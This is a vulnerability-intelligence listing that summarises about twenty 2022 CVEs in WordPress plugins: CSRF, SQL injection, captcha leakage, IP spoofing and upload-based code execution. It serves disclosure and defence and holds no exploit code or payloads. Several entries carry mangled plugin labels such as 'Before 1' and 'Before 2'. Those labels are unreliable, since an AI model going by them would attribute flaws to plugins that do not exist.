Live Vulnerability Intelligence
Threat Database
Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.
Threat Entry
Updated 2024-11-21
CVE-2022-1801 - Very Simple Contact Form Plugin
The Very Simple Contact Form WordPress plugin before 11.6 exposes the solution to the captcha in the rendered contact form, both as hidden input fields and as plain text in the page, making it very easy for bots to bypass the captcha check, rendering the page a likely target for spam bots.
PLUGIN
Very Simple Contact Form
CVE-2022-1801
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1614 - Before 2 Plugin
The WP-EMail WordPress plugin before 2.69.0 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based anti-spamming restrictions.
PLUGIN
Before 2
CVE-2022-1614
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1472 - Better Find And Replace Plugin
The Better Find and Replace WordPress plugin before 1.3.6 does not properly sanitise, validate and escape various parameters before using them in an SQL statement, leading to an SQL Injection
PLUGIN
Better Find And Replace
CVE-2022-1472
Risk Score
Threat Entry
Updated 2025-05-05
CVE-2022-1969 - Mobile Browser Color Select Plugin
The Mobile browser color select plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the admin_update_data() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via forged request granted they can trick a site administrator into performing an action such as clicking on a link.
PLUGIN
Mobile Browser Color Select
CVE-2022-1969
Risk Score
Threat Entry
Updated 2025-05-05
CVE-2022-1749 - Find Any Think Plugin
The WPMK Ajax Finder WordPress plugin is vulnerable to Cross-Site Request Forgery via the createplugin_atf_admin_setting_page() function found in the ~/inc/config/create-plugin-config.php file due to a missing nonce check which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.1.
PLUGIN
Find Any Think
CVE-2022-1749
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1918 - Toolbar To Share Plugin
The ToolBar to Share plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0. This is due to missing nonce validation on the plugin_toolbar_comparte page. This makes it possible for unauthenticated attackers to update the plugins settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
PLUGIN
Toolbar To Share
CVE-2022-1918
Risk Score
Threat Entry
Updated 2025-05-05
CVE-2022-1900 - Copify Plugin
The Copify plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.0. This is due to missing nonce validation on the CopifySettings page. This makes it possible for unauthenticated attackers to update the plugins settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
PLUGIN
Copify
CVE-2022-1900
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1800 - Before 1 Plugin
The Export any WordPress data to XML/CSV WordPress plugin before 1.3.5 does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.
PLUGIN
Before 1
CVE-2022-1800
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1777 - Before 1 Plugin
The Filr WordPress plugin before 1.2.2.1 does not have authorisation check in two of its AJAX actions, allowing them to be called by any authenticated users, such as subscriber. They are are protected with a nonce, however the nonce is leaked on the dashboard. This could allow them to upload arbitrary HTML files as well as delete all files or arbitrary ones.
PLUGIN
Before 1
CVE-2022-1777
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1765 - Hot Linked Image Cacher Plugin
The Hot Linked Image Cacher WordPress plugin through 1.16 is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).
PLUGIN
Hot Linked Image Cacher
CVE-2022-1765
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1758 - Genki Pre Publish Reminder Plugin
The Genki Pre-Publish Reminder WordPress plugin through 1.4.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored XSS as well as RCE when custom code is added via the plugin settings.
PLUGIN
Genki Pre Publish Reminder
CVE-2022-1758
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1791 - One Click Plugin Updater
The One Click Plugin Updater WordPress plugin through 2.4.14 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and disable / hide the badge of the available updates and the related check.
PLUGIN
One Click Plugin Updater
CVE-2022-1791
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1779 - Auto Delete Posts Plugin
The Auto Delete Posts WordPress plugin through 1.3.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and delete specific posts, categories and attachments at once.
PLUGIN
Auto Delete Posts
CVE-2022-1779
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1762 - Before 1 Plugin
The iQ Block Country WordPress plugin before 1.2.20 does not properly checks HTTP headers in order to validate the origin IP address, allowing threat actors to bypass it's block feature by spoofing the headers.
PLUGIN
Before 1
CVE-2022-1762
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1202 - Wp Crm Plugin
The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability.
PLUGIN
Wp Crm
CVE-2022-1202
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1412 - Log Wp Mail Plugin
The Log WP_Mail WordPress plugin through 0.1 saves sent email in a publicly accessible directory using predictable filenames, allowing any unauthenticated visitor to obtain potentially sensitive information like generated passwords.
PLUGIN
Log Wp Mail
CVE-2022-1412
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-0863 - Wp Svg Icons Plugin
The WP SVG Icons WordPress plugin through 3.2.3 does not properly validate uploaded custom icon packs, allowing an high privileged user like an admin to upload a zip file containing malicious php code, leading to remote code execution.
PLUGIN
Wp Svg Icons
CVE-2022-0863
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1683 - Amtythumb Plugin
The amtyThumb WordPress plugin through 4.2.0 does not sanitise and escape a parameter before using it in a SQL statement via its shortcode, leading to an SQL injection and is exploitable by any authenticated user (and not just Author+ like the original advisory mention) due to the fact that they can execute shortcodes via an AJAX action
PLUGIN
Amtythumb
CVE-2022-1683
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2022-1611 - Bulk Page Creator Plugin
The Bulk Page Creator WordPress plugin before 1.1.4 does not protect its page creation functionalities with nonce checks, which makes them vulnerable to CSRF.
PLUGIN
Bulk Page Creator
CVE-2022-1611
Risk Score
Threat Entry
Updated 2026-01-14
CVE-2022-1589 - Change Wp Admin Login Plugin
The Change wp-admin login WordPress plugin before 1.1.0 does not properly check for authorisation and is also missing CSRF check when updating its settings, which could allow unauthenticated users to change the settings. The attacked could also be performed via a CSRF vector
PLUGIN
Change Wp Admin Login
CVE-2022-1589
Risk Score